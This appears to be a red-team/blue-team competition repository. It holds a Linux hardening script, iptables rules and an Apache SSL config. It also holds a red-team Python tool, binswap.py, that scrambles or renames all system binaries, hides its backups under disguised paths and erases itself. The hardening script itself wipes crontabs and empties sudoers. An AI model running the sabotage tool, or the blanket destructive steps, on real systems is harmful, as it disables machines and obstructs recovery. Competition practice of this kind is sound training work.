6 | #Text files needed: 7 | #iptables.sh - will be a script containing the iptables rules you want 8 | #parameters 9 | #first param $1 - name of interface 10 | #################################################################################### 11 | #MAKE SURE YOU SET YOUR IP ADDRESS, MASK, and GATEWAY 12 | #ALSO CHECK IPTABLES SCRIPT BEFORE RUNNING, OR YOUR LIFE WILL BE bad 13 | 14 | IP_ADDR=10.150.100.20 15 | NETMASK=255.255.254.0 16 | GATEWAY=10.150.100.254 17 | TEAM_DNS_SRV=10.2.3.1 18 | 19 | #if not 1 param 20 | if [ $# -ne 1 ] 21 | then 22 | set "eth0" 23 | echo "expected name of main interface, but automatically assumed to be 'eth0'" 24 | fi 25 | 26 | backup() 27 | { 28 | test -d /root/stuff || mkdir /root/stuff 29 | cd /root/stuff 30 | dirs="boot bin sbin etc var root home lib usr lib64" 31 | for dir in $dirs; do 32 | /bin/tar -cjf $dir.tar.bz /$dir 33 | /bin/tar -rf ../notes.tar $dir.tar.bz 34 | done 35 | } 36 | 37 | #setting the net int down 38 | /sbin/ifconfig $1 down 39 | 40 | outfile=info.txt #set output file 41 | 42 | #backup important files and directories and fork before starting everything else 43 | backup &>.backup_info.txt &disown 44 | 45 | #cronjobs aka blowjob - remove cron for all users 46 | users=`/bin/cat /etc/passwd | grep -o '^\w*'` 47 | for user in $users; do 48 | crontab -r -u $user 49 | done &> /dev/null 50 | 51 | #destroy cron and anacron completely 52 | /bin/chown root:root /etc/cron* -R 53 | /bin/chmod o= /etc/cron* -R 54 | /bin/mv /etc/crontab /etc/.crontab.bak 55 | #/usr/bin/chattr +i -R /etc/cron* installing some stuff needs this 56 | /usr/bin/chattr +i /etc/.crontab.bak 57 | 58 | /bin/chown root:root /usr/bin/crontab 59 | /bin/chmod o= /usr/bin/crontab 60 | /usr/bin/chattr +i /usr/bin/crontab 61 | 62 | /usr/bin/chattr -i /etc/anacrontab 63 | /bin/chown root:root /etc/anacrontab 64 | /bin/chmod o= /etc/anacrontab 65 | /usr/bin/chattr +i /etc/anacrontab 66 | 67 | /bin/chown root:root /usr/sbin/anacron 68 | /bin/chmod o= 
/usr/sbin/anacron 69 | /usr/bin/chattr +i /usr/sbin/anacron 70 | 71 | /bin/chown root:root /etc/anacrontab 72 | /bin/mv /etc/anacrontab /etc/.anacrontab.bak 73 | /usr/bin/chattr +i /etc/anacrontab 74 | 75 | #calling iptables script to set all the ip tables rules and add to startup 76 | ./iptables.sh & 77 | test -e /etc/rc.local && /bin/cp /etc/rc.local /etc/rc.local 78 | echo "`pwd`/iptables.sh " > /etc/rc.local 79 | 80 | #stop usually unnecessary services 81 | services="cron crond cups samba smbd inetd portmap rsync rlogin" 82 | for service in $services; do 83 | /usr/bin/env service $service stop 84 | echo "/usr/bin/env service $service stop" >> /etc/rc.local 85 | done 86 | 87 | #determine distro to get package manage and int config location 88 | if [ -f /etc/redhat-release ] ; then 89 | pkmgr='/usr/bin/yum' 90 | #sys_netconfig="/etc/sysconfig/network-scripts/ifcfg-$1" 91 | elif [ -f /etc/debian_version ] ; then 92 | pkmgr='/usr/bin/apt-get' 93 | #sys_netconfig="/etc/network/interfaces" 94 | elif [ -f /etc/gentoo_version ]; then #possible might need this too: -f /etc/gentoo-release 95 | pkmgr='/usr/bin/emerge' 96 | /bin/ln -s /etc/init.d/net.lo /etc/init.d/net.$1 #create link so system recognizes net.lo file. needed for manual net config 97 | #sys_netconfig="/etc/conf.d/net" 98 | elif [ -f /etc/slackware-version ]; then 99 | pkmgr='/usr/bin/which installpkg' 100 | #sys_netconfig="/etc/rc.d/rc.inet1.conf" 101 | else 102 | echo "OS/distro not detected...using debian defaults..." 
>&2 103 | pkmgr='/usr/bin/apt-get' #if can't find OS, just use apt-get and hope for best 104 | #sys_netconfig="/etc/network/interfaces" 105 | fi 106 | 107 | #set static ip address, gateway and DNS 108 | /sbin/ifconfig $1 $IP_ADDR netmask $NETMASK 109 | /sbin/route add default gw $GATEWAY 110 | echo "nameserver 8.8.8.8" > /etc/resolv.conf 111 | echo "nameserver 8.8.4.4" >> /etc/resolv.conf 112 | #echo "nameserver $TEAM_DNS_SRV" >> /etc/resolv.conf 113 | 114 | #set hosts file location and do hosts file securing 115 | hosts="/etc/hosts" 116 | 117 | /usr/bin/chattr -i $hosts 118 | /bin/cp $hosts $hosts.backup 119 | echo "127.0.0.1 localhost" > $hosts 120 | echo "127.0.1.1 `hostname`" >> $hosts 121 | /bin/chown root:root $hosts 122 | /bin/chmod 600 $hosts 123 | /usr/bin/chattr +i $hosts 124 | 125 | #remove all users from the root group except for root. and some services possibly 126 | users=`/bin/cat /etc/passwd | grep -o '^\w*'` 127 | for user in $users; do 128 | usermod -R root $user 129 | done &> /dev/null 130 | 131 | #edit sudoers 132 | /bin/mv /etc/sudoers /etc/.sudoers.bak 133 | echo > /etc/sudoers 134 | /bin/chown root:root /etc/sudoers 135 | /bin/chmod 000 /etc/sudoers 136 | /usr/bin/chattr +i /etc/sudoers 137 | 138 | #put the interface back up ifconfig up $1 139 | /sbin/ifconfig $1 up 140 | 141 | #upgrading and updating everything 142 | bash -c "$pkmgr update -y && $pkmgr upgrade -y" &>.updateinfo.txt &disown 143 | 144 | #Make Sure No Non-Root Accounts Have UID Set To 0 145 | echo "Accounts with UID = 0" >> $outfile 146 | echo `/usr/bin/awk -F: '($3 == "0") {print}' /etc/passwd` >> $outfile 147 | echo >> $outfile 148 | 149 | #all listening ports 150 | echo "All the ports that you're listening on" >> $outfile 151 | echo `/usr/bin/lsof -nPi | /bin/grep -iF listen` >> $outfile 152 | echo >> $outfile 153 | 154 | #finding all of the world-writeable files 155 | echo "All of the world-writable files" >> $outfile 156 | echo `/usr/bin/find / -xdev -type d \( -perm -0002 
-a ! -perm -1000 \) -print` >> $outfile &disown 157 | echo >> $outfile 158 | 159 | #find all suid bit files and remove suid bit if it seems like the binary doesn't need it 160 | #is not tested, needs more binaries to be added to the check in the if statement! 161 | badFiles=`/usr/bin/find / -type f \( -perm -04000 -o -perm -02000 \)` 162 | for file in $badFiles; do 163 | if [ "`/bin/grep -iP '.*passwd.*|su|ping|.*mount.*|crontab'`" = "" ]; then 164 | /bin/chmod u-s "$file" 165 | echo "got rid of suid bit on '$file'" >> $outfile 166 | fi 167 | done 168 | 169 | # #finding all of the no owner files 170 | # echo "All of the no owner files" >> $outfile 171 | # /usr/bin/find / -xdev \( -nouser -o -nogroup \) -print >> $outfile 172 | # echo "" >> $outfile 173 | 174 | #rename certain executables and chattr them 175 | /bin/mv /usr/bin/gcc /usr/bin/zgcc 176 | /usr/bin/chattr +i /usr/bin/zgcc 177 | /bin/mv /sbin/reboot /sbin/zreboot 178 | /usr/bin/chattr +i /sbin/zreboot 179 | /bin/mv /sbin/shutdown /sbin/zshutdown 180 | /usr/bin/chattr +i /sbin/zshutdown 181 | 182 | #makes the jail. if /var/jail taken, somewhat random directory attempted to be made in hopes it doesn't exist 183 | if [ ! -e /var/jail ]; then 184 | ./jail_maker.sh -s /var/jail 185 | else 186 | let first="$RANDOM % 100" 187 | let second="$RANDOM % 100" 188 | ./jail_maker.sh -s /var/jail_${first}-${second} 189 | fi 190 | -------------------------------------------------------------------------------- /blue/iptables.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | #set path of iptables 3 | path=/sbin 4 | #shitboxIP=10.0.0.0 5 | #scoremaster=10.0.0.0 6 | 7 | #drop all previous rules 8 | $path/iptables -F 9 | $path/ip6tables -F 10 | 11 | #block typical bad stuff 12 | $path/iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP #null packets 13 | $path/iptables -A INPUT -p tcp ! 
--syn -m state --state NEW -j DROP #syn-flood packets 14 | $path/iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP #XMAS packets (recon) 15 | $path/iptables -A INPUT -m state --state INVALID -j DROP #invalid packets 16 | 17 | # Accept in/out from loopback 18 | $path/iptables -A INPUT -i lo -j ACCEPT 19 | $path/iptables -A OUTPUT -o lo -j ACCEPT 20 | 21 | # Allow icmp request/reply from and to host 22 | $path/iptables -A INPUT -p icmp --icmp-type 0 -j ACCEPT 23 | $path/iptables -A OUTPUT -p icmp --icmp-type 0 -j ACCEPT 24 | $path/iptables -A INPUT -p icmp --icmp-type 8 -j ACCEPT 25 | $path/iptables -A OUTPUT -p icmp --icmp-type 8 -j ACCEPT 26 | 27 | # Allow established TCP connections to re-enter 28 | $path/iptables -A INPUT -m state --state ESTABLISHED -j ACCEPT 29 | 30 | # Allow HTTP and HTTPS in and out for server and client 31 | $path/iptables -A OUTPUT -p tcp -m multiport --sports 80,443 -j ACCEPT #server outbound 32 | $path/iptables -A INPUT -p tcp -m multiport --dports 80,443 -j ACCEPT #server inbound 33 | $path/iptables -A OUTPUT -p tcp -m multiport --dports 80,443 -j ACCEPT #client outbound 34 | #$path/iptables -A INPUT -p tcp -m multiport --sports 80,443 -j ACCEPT #client inbound - shouldn't need as long as you allow established tcp connections back in 35 | 36 | # Allow MySQL queries as a client 37 | #$path/iptables -A INPUT -p tcp -m tcp --sport 3306 -j ACCEPT 38 | #$path/iptables -A OUTPUT -p tcp -m tcp --dport 3306 -j ACCEPT 39 | 40 | # Allow MySQL queries as a server 41 | #$path/iptables -A INPUT -p tcp -m tcp --dport 3306 -j ACCEPT 42 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 3306 -j ACCEPT 43 | 44 | # Allow DNS queries as a client (note: the two INPUT --sport 53 rules below match on the remote source port alone, so they also admit unsolicited inbound packets that merely come from port 53; replies to our own queries already re-enter via the ESTABLISHED rule above, the same reasoning as the commented-out client-inbound HTTP rule) 45 | $path/iptables -A INPUT -p udp --sport 53 -j ACCEPT 46 | $path/iptables -A INPUT -p tcp --sport 53 -j ACCEPT #needed for large zone transfers 47 | $path/iptables -A OUTPUT -p udp --dport 53 -j ACCEPT 48 | $path/iptables -A OUTPUT -p tcp --dport 53 -j ACCEPT #needed for large zone transfers 49 | 50 | #allow 
DNS queries as a server 51 | #$path/iptables -A INPUT -p udp --dport 53 -j ACCEPT 52 | #$path/iptables -A INPUT -p tcp --dport 53 -j ACCEPT #needed for large zone transfers 53 | #$path/iptables -A OUTPUT -p udp --sport 53 -j ACCEPT 54 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 53 -j ACCEPT #needed for large zone transfers 55 | 56 | # Allow DHCP client traffic 57 | #$path/iptables -A INPUT -p udp --dport 68 -j ACCEPT 58 | #$path/iptables -A OUTPUT -p udp --sport 68 -j ACCEPT 59 | 60 | # Allow DHCP server traffic 61 | #$path/iptables -A INPUT -p udp --dport 67 -j ACCEPT 62 | #$path/iptables -A OUTPUT -p udp --sport 67 -j ACCEPT 63 | 64 | #allow ssh in and out for a server 65 | #$path/iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT 66 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT 67 | 68 | #allow ssh out for a client (note: the INPUT --sport 22 rule below matches on the remote source port alone, so it admits any inbound TCP that merely comes from port 22; replies to our own ssh sessions already re-enter via the ESTABLISHED rule above) 69 | $path/iptables -A INPUT -p tcp -m tcp --sport 22 -j ACCEPT 70 | $path/iptables -A OUTPUT -p tcp -m tcp --dport 22 -j ACCEPT 71 | 72 | #allow FTP server traffic; only for ftp servers! 73 | #$path/iptables -A INPUT -p tcp -m tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT #initial connection 74 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 21 -m state --state NEW,ESTABLISHED -j ACCEPT #initial connection 75 | #$path/iptables -A INPUT -p tcp -m tcp --dport 20 -m state --state NEW,ESTABLISHED -j ACCEPT #active mode 76 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 20 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT #active mode 77 | #$path/iptables -A INPUT -p tcp -m tcp --sport 1024:65535 --dport 1024:65535 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT #passive 78 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 1024:65535 --dport 1024:65535 -m state --state NEW,ESTABLISHED -j ACCEPT #passive 79 | 80 | #smtp in/out rules; only for smtp servers! 
81 | #$path/iptables -A INPUT -p tcp -m tcp --dport 25 -j ACCEPT 82 | #$path/iptables -A OUTPUT -p tcp -m tcp --sport 25 -j ACCEPT 83 | 84 | #allow opsview agent in/out to specific IP address (if using monitoring service) 85 | #monServer=127.0.0.1 #<-replace with IP of monitoring server 86 | #$path/iptables -A INPUT -p tcp -s $monServer --dport 5666 -j ACCEPT 87 | #$path/iptables -A OUTPUT -p tcp -d $monServer --sport 5666 -j ACCEPT 88 | 89 | #TODO, rules for POP and/or IMAP 90 | 91 | #VOIP - needed for asterisk/voip server! 92 | # SIP on UDP port 5060. Other SIP servers may need TCP port 5060 as well 93 | #$path/iptables -A INPUT -p udp -m udp --dport 5060 -j ACCEPT 94 | #$path/iptables -A INPUT -p udp -m udp --dport 4569 -j ACCEPT # IAX2- the IAX protocol 95 | #$path/iptables -A INPUT -p udp -m udp --dport 5036 -j ACCEPT # IAX - most have switched to IAX v2, or ought to 96 | # RTP - the media stream 97 | #$path/iptables -A INPUT -p udp -m udp --dport 10000:20000 -j ACCEPT # (related to the port range in /etc/asterisk/rtp.conf) 98 | #$path/iptables -A INPUT -p udp -m udp --dport 2727 -j ACCEPT # MGCP - if you use media gateway control protocol in your configuration 99 | 100 | # Log firewall hits 101 | $path/iptables -A INPUT -m limit --limit 15/min -j LOG --log-level 4 --log-prefix "INv4 " 102 | $path/iptables -A OUTPUT -m limit --limit 15/min -j LOG --log-level 4 --log-prefix "OUTv4 " 103 | $path/ip6tables -A INPUT -m limit --limit 3/min -j LOG --log-level 4 --log-prefix "INv6 " 104 | $path/ip6tables -A OUTPUT -m limit --limit 3/min -j LOG --log-level 4 --log-prefix "OUTv6 " 105 | 106 | # Drop all other stuff 107 | $path/iptables -A INPUT -j DROP 108 | $path/iptables -A OUTPUT -j DROP 109 | $path/ip6tables -A INPUT -j DROP 110 | $path/ip6tables -A OUTPUT -j DROP 111 | 112 | # INSTATE THESE RULES ON HOST TO PROTECT 113 | # This will reroute non-scoring engine traffic to a honeypot and allow the traffic to be routed back from 114 | # that honeypot to the original 
sender. 115 | # NOTE: vsftpd needs pasv_promiscuous=yes for "fake" ftp 116 | 117 | # echo "1" > /proc/sys/net/ipv4/ip_forward 118 | # $path/iptables -D INPUT -j DROP 119 | # $path/iptables -D OUTPUT -j DROP 120 | # $path/iptables -t nat -A PREROUTING -p tcp -j DNAT --to-destination $shitboxIP #Make all traffic go to the playground 121 | # $path/iptables -t nat -A POSTROUTING -d $shitboxIP -p tcp -j MASQUERADE 122 | # $path/iptables -t nat -I PREROUTING -p tcp -s $scoremaster -j ACCEPT #Accept all traffic from the scorebox 123 | 124 | # $path/iptables -t nat -A PREROUTING -p udp -j DNAT --to-destination $shitboxIP #Make all traffic go to the playground 125 | # $path/iptables -t nat -A POSTROUTING -d $shitboxIP -p udp -j MASQUERADE 126 | # $path/iptables -t nat -I PREROUTING -p udp -s $scoremaster -j ACCEPT #Accept all traffic from the scorebox 127 | 128 | #$path/iptables -I INPUT -d $shitboxIP -j ACCEPT 129 | #$path/iptables -I FORWARD -d $shitboxIP -j ACCEPT 130 | #$path/iptables -I OUTPUT -d $shitboxIP -j ACCEPT 131 | #$path/iptables -I INPUT -s $shitboxIP -j ACCEPT 132 | #$path/iptables -I FORWARD -s $shitboxIP -j ACCEPT 133 | #$path/iptables -I OUTPUT -s $shitboxIP -j ACCEPT 134 | 135 | -------------------------------------------------------------------------------- /red/binswap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from sys import exit, argv 3 | import platform 4 | import os 5 | from random import choice 6 | import itertools 7 | from multiprocessing import Process 8 | from pickle import dump, load 9 | import shutil 10 | from hashlib import md5 11 | 12 | #TODO: 13 | # 1. figure out what binaries are needed to login successfully so we don't swap those. 14 | # 2. 
add a prompt to self erase after a revert, but timeout after like 5-10 seconds and 15 | # default to no 16 | 17 | operatingSystem = platform.system().lower() #detect OS 18 | if operatingSystem == "windows": #set up some vars for specific OSes 19 | slash = "\\" 20 | dest = "C:\\Windows\\bin_locale" #directory where binaries will be backed up 21 | backfile = "C:\Windows\Globalization\Global.nls" #backup/revert file 22 | else: 23 | slash = "/" 24 | dest = "/lib/lib-udev" #directory where binaries will be backed up 25 | backfile = "/var/local/opt" #backup/revert file 26 | 27 | #print help 28 | def help(): 29 | print "-R, --random To randomly rename binaries instead of swapping them" 30 | print "-r, --revert To revert from disaster" 31 | 32 | #swap two given values in a list 33 | def swap(xs, a, b): 34 | xs[a], xs[b] = xs[b], xs[a] 35 | 36 | #find one derangement of the given list, xs 37 | def derange(xs): 38 | for a in xrange(1, len(xs)): 39 | b = choice(xrange(0, a)) 40 | swap(xs, a, b) 41 | 42 | #shuffle binaries 43 | def shuffle(keys, oldDict, newDict): 44 | for key in keys: 45 | shutil.move(dest + oldDict[key], newDict[key]) 46 | 47 | #put the binaries back to where they should be 48 | def unshuffle(oldDict, newDict): 49 | for key in newDict.keys(): 50 | shutil.move(dest + newDict[key], oldDict[key]) 51 | 52 | #backup the binary files 53 | def backup(myDict, directories, revert=0): 54 | cmd = "" 55 | if operatingSystem == "windows": 56 | mkdirBin = "mkdir" 57 | else: #linux! 
58 | if revert: 59 | mkdirBin = "/var/mkdir" 60 | else: #if we're not reverting, make backups of python and mkdir 61 | cmd = ("/bin/cp `which mkdir` /var/mkdir;" 62 | "/bin/cp `which python` /var/spool/python;") 63 | mkdirBin = "/usr/bin/env mkdir" 64 | 65 | cmd = cmd + "%s -p \"%s\";" % (mkdirBin, dest) #create initial backup dir 66 | 67 | for myDir in directories: #remake directory structure 68 | cmd = cmd + "%s -p \"%s%s\";" % (mkdirBin, dest, myDir) 69 | 70 | os.system(cmd) #create directories needed 71 | 72 | #should work cross platform 73 | for key, value in myDict.iteritems(): #backup the actual binaries 74 | shutil.copy(value, dest + value) 75 | 76 | #get all files from the directories given and place them in a dictionary 77 | def getFiles(directories): 78 | myDict = {} 79 | for myDir in directories: #traverse given dirs 80 | if os.path.isdir(myDir): #if dir exists traverse files in it 81 | for myBin in os.listdir(myDir): 82 | #if windows 83 | if operatingSystem == "windows": 84 | #if not an executable or if cmd or python, skip it 85 | if myBin[-4:] != ".exe" or myBin == "cmd.exe" or "python" in myBin: 86 | continue 87 | #if linux 88 | else: #if a shell, env or python, skip it 89 | if (myBin == "sh" or myBin == "bash" or myBin == "csh" or myBin == "zsh" 90 | or myBin == "env" or myBin == "tcsh" or myBin == "dash" 91 | or myBin == "ash" or "python" in myBin): 92 | continue 93 | 94 | fullBin = "%s%s%s" % (myDir, slash, myBin) 95 | if os.path.isfile(fullBin): #make sure it's a file not a dir 96 | myDict[myBin] = fullBin 97 | #not tested, but this should recurse through all directories which would be useful 98 | #for the "Program Files" directory. should look into this. 
might be bad for 99 | #C:\windows since that's a huge dir with a lot of dirs in it 100 | #elif operatingSystem == "windows": 101 | # return getFiles([myBin]) 102 | 103 | return myDict 104 | 105 | #main binary swapping function 106 | def binswap(rename=0): 107 | global dest #so our change to dest takes place when used in other functions 108 | 109 | #pick directories based on OS 110 | if operatingSystem == "windows": 111 | dirs = ["C:\Windows", "C:\Windows\System32"] 112 | else: 113 | dirs = ["/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin", "/usr/local/sbin"] 114 | 115 | #get the files into a dictionary 116 | oldDict = getFiles(dirs) 117 | 118 | #if just swapping, create backups of all the binaries so we can copy things properly 119 | #during the shuffle 120 | if not rename: 121 | backupThread = Process(target=backup, args=(oldDict,dirs,)) 122 | backupThread.start() 123 | 124 | #create copy of dict and generate list of keys. 125 | newDict = oldDict.copy() 126 | oldKeys = oldDict.keys() 127 | 128 | if rename: #if randomly renaming binaries 129 | dest = "" #set dest to nothing since we won't be moving from the backup dir 130 | 131 | #loop through and change the values to be random in the newDict 132 | #the new random value will consist of a random combination of the beginning of the md5 133 | #hash of the string, the last two characters of that hash, then a random number (0,99) 134 | for myKey in oldKeys: 135 | keyHash = md5(myKey).hexdigest() 136 | newName = (keyHash[choice(range(0,2)):choice(range(5,7))] + keyHash[-2:] 137 | + str(choice(range(0,99)))) 138 | 139 | #get the full path before the binary name 140 | lastSlash = str.rfind(newDict[myKey], slash) 141 | newName = newDict[myKey][:lastSlash + 1] + newName 142 | 143 | if operatingSystem == "windows": #if windows, append .exe because file extensions 144 | newName = newName + ".exe" 145 | 146 | newDict[myKey] = newName 147 | else: #if swapping binaries 148 | #get a copy of the list of keys, then find a 
derangement of that 149 | newKeys = list(oldKeys) 150 | derange(newKeys) 151 | 152 | #shuffle the key:value pairs 153 | for oldKey, newKey in zip(oldKeys, newKeys): 154 | newDict[newKey] = oldDict[oldKey] 155 | 156 | #wait till thread is done and make sure it succeeded 157 | backupThread.join() 158 | if backupThread.exitcode != 0: 159 | print "backing up failed. exiting..." 160 | return(backupThread.exitcode) 161 | 162 | #shuffle/rename the binaries! 163 | shuffleThread = Process(target=shuffle, args=(oldKeys, oldDict, newDict,)) 164 | shuffleThread.start() 165 | 166 | #prepare for revert 167 | with open(backfile, 'wb') as outfile: 168 | dump([oldDict, newDict, rename], outfile) 169 | 170 | shuffleThread.join() #wait for shuffling to finish before ending 171 | os.system("echo > %s" % argv[0]) #self erase 172 | print "done swapping" 173 | return 0 174 | 175 | #revert binaries back to original 176 | def revert(): 177 | global dest #so our change to dest takes place when used in other functions 178 | 179 | #pick directories based on OS 180 | if operatingSystem == "windows": 181 | dirs = ["C:\Windows", "C:\Windows\System32"] 182 | else: 183 | dirs = ["/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin", "/usr/local/sbin"] 184 | 185 | #grab oldDict, newDict and type of reversion from file 186 | if os.path.exists(backfile): 187 | with open(backfile, 'rb') as infile: 188 | oldDict, newDict, rename = load(infile) 189 | else: 190 | print "cannot find backup file, ya screwed" 191 | return 1 192 | 193 | #if we just renamed randomly, set dest to nothing bc we aren't moving binaries from that dir 194 | if rename: 195 | dest = "" 196 | else:#if we swapped, create copies of the binaries 197 | backup(oldDict, dirs, revert=1) 198 | 199 | #put binaries back in place 200 | unshuffle(oldDict, newDict) 201 | 202 | print "done reverting" 203 | return 0 204 | 205 | if __name__ == "__main__": 206 | if len(argv) > 1: #check the arg if we have any 207 | #if they want to revert a 
previous action 208 | if argv[1] == "-r" or argv[1] == "--revert" or argv[1] == "revert" or argv[1] == "-revert": 209 | exit(revert()) 210 | #if they want to randomly rename binaries 211 | elif argv[1] == "-R" or argv[1] == "--random" or argv[1] == "random" or argv[1] == "-random": 212 | exit(binswap(rename=1)) 213 | elif "help" in argv[1]: 214 | help() 215 | else: #if arg didn't match, swap away! 216 | exit(binswap()) 217 | else: #if no args, just swap! 218 | exit(binswap()) 219 | -------------------------------------------------------------------------------- /blue/apache2/default: -------------------------------------------------------------------------------- 1 | 2 | 3 | ServerAdmin webmaster@localhost 4 | ServerName <>:443 5 | DocumentRoot /var/www 6 | 7 | Options FollowSymLinks 8 | AllowOverride None 9 | 10 | 11 | Options Indexes FollowSymLinks MultiViews 12 | AllowOverride None 13 | Order allow,deny 14 | allow from all 15 | 16 | 17 | ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ 18 | 19 | AllowOverride None 20 | Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch 21 | Order allow,deny 22 | Allow from all 23 | 24 | 25 | ErrorLog ${APACHE_LOG_DIR}/error.log 26 | 27 | # Possible values include: debug, info, notice, warn, error, crit, 28 | # alert, emerg. 29 | LogLevel warn 30 | 31 | CustomLog ${APACHE_LOG_DIR}/ssl_access.log combined 32 | 33 | Alias /doc/ "/usr/share/doc/" 34 | 35 | Options Indexes MultiViews FollowSymLinks 36 | AllowOverride None 37 | Order deny,allow 38 | Deny from all 39 | Allow from 127.0.0.0/255.0.0.0 ::1/128 40 | 41 | 42 | # SSL Engine Switch: 43 | # Enable/Disable SSL for this virtual host. 44 | SSLEngine on 45 | 46 | # A self-signed (snakeoil) certificate can be created by installing 47 | # the ssl-cert package. See 48 | # /usr/share/doc/apache2.2-common/README.Debian.gz for more info. 49 | # If both key and certificate are stored in the same file, only the 50 | # SSLCertificateFile directive is needed. 
51 | SSLCertificateFile /etc/apache2/ssl/apache.crt 52 | SSLCertificateKeyFile /etc/apache2/ssl/apache.key 53 | 54 | # Server Certificate Chain: 55 | # Point SSLCertificateChainFile at a file containing the 56 | # concatenation of PEM encoded CA certificates which form the 57 | # certificate chain for the server certificate. Alternatively 58 | # the referenced file can be the same as SSLCertificateFile 59 | # when the CA certificates are directly appended to the server 60 | # certificate for convenience. 61 | #SSLCertificateChainFile /etc/apache2/ssl.crt/server-ca.crt 62 | 63 | # Certificate Authority (CA): 64 | # Set the CA certificate verification path where to find CA 65 | # certificates for client authentication or alternatively one 66 | # huge file containing all of them (file must be PEM encoded) 67 | # Note: Inside SSLCACertificatePath you need hash symlinks 68 | # to point to the certificate files. Use the provided 69 | # Makefile to update the hash symlinks after changes. 70 | #SSLCACertificatePath /etc/ssl/certs/ 71 | #SSLCACertificateFile /etc/apache2/ssl.crt/ca-bundle.crt 72 | 73 | # Certificate Revocation Lists (CRL): 74 | # Set the CA revocation path where to find CA CRLs for client 75 | # authentication or alternatively one huge file containing all 76 | # of them (file must be PEM encoded) 77 | # Note: Inside SSLCARevocationPath you need hash symlinks 78 | # to point to the certificate files. Use the provided 79 | # Makefile to update the hash symlinks after changes. 80 | #SSLCARevocationPath /etc/apache2/ssl.crl/ 81 | #SSLCARevocationFile /etc/apache2/ssl.crl/ca-bundle.crl 82 | 83 | # Client Authentication (Type): 84 | # Client certificate verification type and depth. Types are 85 | # none, optional, require and optional_no_ca. Depth is a 86 | # number which specifies how deeply to verify the certificate 87 | # issuer chain before deciding the certificate is not valid. 
88 | #SSLVerifyClient require 89 | #SSLVerifyDepth 10 90 | 91 | # Access Control: 92 | # With SSLRequire you can do per-directory access control based 93 | # on arbitrary complex boolean expressions containing server 94 | # variable checks and other lookup directives. The syntax is a 95 | # mixture between C and Perl. See the mod_ssl documentation 96 | # for more details. 97 | # 98 | #SSLRequire ( %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \ 99 | # and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \ 100 | # and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \ 101 | # and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \ 102 | # and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20 ) \ 103 | # or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/ 104 | # 105 | 106 | # SSL Engine Options: 107 | # Set various options for the SSL engine. 108 | # o FakeBasicAuth: 109 | # Translate the client X.509 into a Basic Authorisation. This means that 110 | # the standard Auth/DBMAuth methods can be used for access control. The 111 | # user name is the `one line' version of the client's X.509 certificate. 112 | # Note that no password is obtained from the user. Every entry in the user 113 | # file needs this password: `xxj31ZMTZzkVA'. 114 | # o ExportCertData: 115 | # This exports two additional environment variables: SSL_CLIENT_CERT and 116 | # SSL_SERVER_CERT. These contain the PEM-encoded certificates of the 117 | # server (always existing) and the client (only existing when client 118 | # authentication is used). This can be used to import the certificates 119 | # into CGI scripts. 120 | # o StdEnvVars: 121 | # This exports the standard SSL/TLS related `SSL_*' environment variables. 122 | # Per default this exportation is switched off for performance reasons, 123 | # because the extraction step is an expensive operation and is usually 124 | # useless for serving static content. So one usually enables the 125 | # exportation for CGI and SSI requests only. 
126 | # o StrictRequire: 127 | # This denies access when "SSLRequireSSL" or "SSLRequire" applied even 128 | # under a "Satisfy any" situation, i.e. when it applies access is denied 129 | # and no other module can change it. 130 | # o OptRenegotiate: 131 | # This enables optimized SSL connection renegotiation handling when SSL 132 | # directives are used in per-directory context. 133 | #SSLOptions +FakeBasicAuth +ExportCertData +StrictRequire 134 | 135 | SSLOptions +StdEnvVars 136 | 137 | 138 | SSLOptions +StdEnvVars 139 | 140 | 141 | # SSL Protocol Adjustments: 142 | # The safe and default but still SSL/TLS standard compliant shutdown 143 | # approach is that mod_ssl sends the close notify alert but doesn't wait for 144 | # the close notify alert from client. When you need a different shutdown 145 | # approach you can use one of the following variables: 146 | # o ssl-unclean-shutdown: 147 | # This forces an unclean shutdown when the connection is closed, i.e. no 148 | # SSL close notify alert is send or allowed to received. This violates 149 | # the SSL/TLS standard but is needed for some brain-dead browsers. Use 150 | # this when you receive I/O errors because of the standard approach where 151 | # mod_ssl sends the close notify alert. 152 | # o ssl-accurate-shutdown: 153 | # This forces an accurate shutdown when the connection is closed, i.e. a 154 | # SSL close notify alert is send and mod_ssl waits for the close notify 155 | # alert of the client. This is 100% SSL/TLS standard compliant, but in 156 | # practice often causes hanging connections with brain-dead browsers. Use 157 | # this only for browsers where you know that their SSL implementation 158 | # works correctly. 159 | # Notice: Most problems of broken clients are also related to the HTTP 160 | # keep-alive facility, so you usually additionally want to disable 161 | # keep-alive for those clients, too. Use variable "nokeepalive" for this. 
